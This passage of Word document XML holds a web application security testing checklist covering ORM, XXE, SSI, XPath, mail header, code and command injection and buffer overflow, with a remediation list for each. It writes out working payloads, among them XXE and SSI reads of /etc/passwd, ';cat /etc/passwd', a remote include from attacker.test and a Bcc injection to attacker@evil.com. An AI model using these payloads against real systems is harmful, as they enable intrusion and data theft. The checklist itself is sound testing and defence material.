        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt filter manipulation to broaden search scope or bypass authentication conditions.</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username=*</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">username=*)(uid=*))(|(uid=*</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">password=password</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Use a vetted LDAP library that properly escapes special filter characters, never construct filter strings via concatenation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply strict input validation (allow-list) for identity-related fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-007  —  Testing for ORM Injection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Hibernate, NHibernate (context-specific), Burp Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the ORM layer is vulnerable to injection when raw/native queries or unsafe query-builder patterns are used with unsanitized input.</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Identify any endpoints using raw HQL/native SQL fragments within the ORM layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the same injection technique set used for OTG-INPVAL-005 SQL injection, since exploitation of ORM injection follows an identical methodology.</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 OR '1'='1  (applied against ORM-backed search/filter fields using raw query fragments)</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Use the ORM's parameterized/named-parameter query APIs exclusively; avoid raw query string concatenation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Code-review any use of native/raw queries within the ORM layer specifically for injection risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-008  —  Testing for XML Injection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 Wfuzz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether user input is embedded into XML documents/parsers without proper escaping, potentially enabling tag injection, CDATA abuse, or XML External Entity (XXE) attacks.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Inject XML meta-characters (', ", &lt;, &gt;, &lt;!--, --&gt;, &amp;, &lt;![CDATA[, ]]&gt;) into any field ultimately processed as XML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If the application parses attacker-supplied XML directly, attempt an XXE payload referencing a local file via a DOCTYPE/ENTITY declaration.</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&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</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Disable DTD processing and external entity resolution in the XML parser configuration (this alone prevents XXE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Encode/escape all user input embedded into XML output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prefer JSON over XML for new APIs where feasible, reducing this attack surface entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-009  —  Testing for SSI Injection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Server-Side Includes directives can be injected into pages that support SSI (typically .shtml), allowing command execution or file disclosure.</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Confirm the presence of SSI-processed extensions (.shtml) on the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject SSI meta-characters and a benign include directive into reflected/stored input fields.</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&lt;!--#include virtual="/etc/passwd" --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!--#exec cmd="id" --&gt;</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Disable SSI processing where not explicitly required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Never allow user input to be rendered into a context that is parsed by the SSI engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-010  —  Testing for XPath Injection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user input is embedded into XPath queries without proper escaping, potentially allowing authentication bypass or data extraction from XML data stores.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Submit a single quote in XPath-backed input fields and look for XML parser error disclosure confirming injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt an always-true XPath authentication bypass payload against login fields backed by an XML datastore.</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Username: ' or '1'='1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Password: ' or '1'='1</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Use parameterized XPath queries (XPath variable bindings) rather than string concatenation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply strict input validation for any field feeding an XPath expression.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-011  —  IMAP/SMTP Injection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user input reaching mail-handling functionality (contact forms, password reset emails) can inject additional IMAP/SMTP commands or headers.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Identify parameters vulnerable to special characters commonly used in header injection (\, ', ", @, #, !, |).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject CRLF sequences into email-related fields (To, From, Subject) to attempt header/body injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand the underlying mail data flow and deployment (which component ultimately constructs the raw SMTP/IMAP command).</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email=victim@test.com%0d%0aBcc:attacker@evil.com%0d%0aSubject:Injected</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Strictly validate and reject CR/LF and other header-injection characters in any field used to construct email headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a vetted mail library that separates headers from body content programmatically rather than via raw string construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-012  —  Testing for Code Injection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 Liffy, Panoptic, fimap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether user input is passed to a code interpreter (eval, OS command execution) or used unsafely to include local/remote files.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Inject OS command syntax into any parameter that might reach a shell/eval context and observe command execution evidence (time delay, output reflection).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For suspected Local File Inclusion, use dot-dot-slash traversal and PHP wrapper techniques (php://filter) to read source rather than execute it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For suspected Remote File Inclusion, attempt to include a file hosted on an attacker-controlled URL and confirm execution.</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?arg=1; system('id')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">?page=php://filter/convert.base64-encode/resource=index.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">?page=http://attacker.test/malicious_page.txt</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Never pass user input to eval() or an OS shell; use safe, purpose-built APIs instead of shelling out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable allow_url_include/allow_url_fopen where file inclusion is not required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply strict allow-listing for any legitimately dynamic include/file-path functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-013  —  Testing for Command Injection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 Commix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether user input reaches an OS command execution context, allowing arbitrary command execution on the underlying server.</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Understand the application platform/OS and folder structure to craft plausible, platform-appropriate payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject shell metacharacters (; &amp; | `) combined with a benign, observable command (id, whoami, ping with a delay).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Commix to automate detection and exploitation across a wider payload/technique set.</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%3Bcat%20/etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test.pdf+|+Dir C:\</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">commix --url="https://target.com/page?arg=1"</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Never construct shell commands from user input; use language-native APIs (e.g., library calls) instead of shelling out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If shelling out is unavoidable, strictly allow-list input and use parameterized execution APIs that do not invoke a shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-014  —  Testing for Buffer Overflow</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Immunity Canvas, Spike, Metasploit Framework, Nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the application or an underlying native component is vulnerable to heap overflow, stack overflow, or format-string vulnerabilities from oversized or malformed input.</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Identify any native (C/C++) components processing user input directly (rare in modern web stacks, more common in embedded devices/legacy services).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzz identified input points with progressively larger and malformed payloads using Spike, monitoring the target process for crashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test format-string vulnerabilities by injecting format specifiers (%s, %x, %n) into fields that may be passed to C-style formatting functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If a crash is triggered, use a debugger and Metasploit's pattern_create/pattern_offset utilities to determine exploitability.</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python -c "print('A'*5000)"  # oversized input for manual fuzzing</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">%x%x%x%x%x%x%x%x  # format string probe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msf-pattern_create -l 3000</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Use memory-safe languages for new development where feasible; for existing native code, adopt bounds-checked string/memory functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable OS-level exploit mitigations (ASLR, DEP/NX, stack canaries) on all deployed binaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly fuzz-test any native components as part of the SDLC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INPVAL-015  —  Testing for Incubated Vulnerabilities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BeEF, Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether a chain of individually low-severity issues (file upload, stored XSS, injection, misconfigured servers) can be combined into a persistent, higher-impact compromise.</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Review all previously identified findings across categories for combinable attack chains (e.g., an unrestricted file upload combined with a misconfigured server executing uploaded scripts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to chain findings into a proof-of-concept persistent compromise, documenting each step.</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(Scenario-specific — combines techniques already documented under file upload, XSS, and injection sections)</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Remediate individually low-severity findings promptly; do not deprioritize based on isolated severity scoring alone, since combined impact can be critical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Perform periodic attack-chain / adversary-emulation exercises, not only isolated vulnerability scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
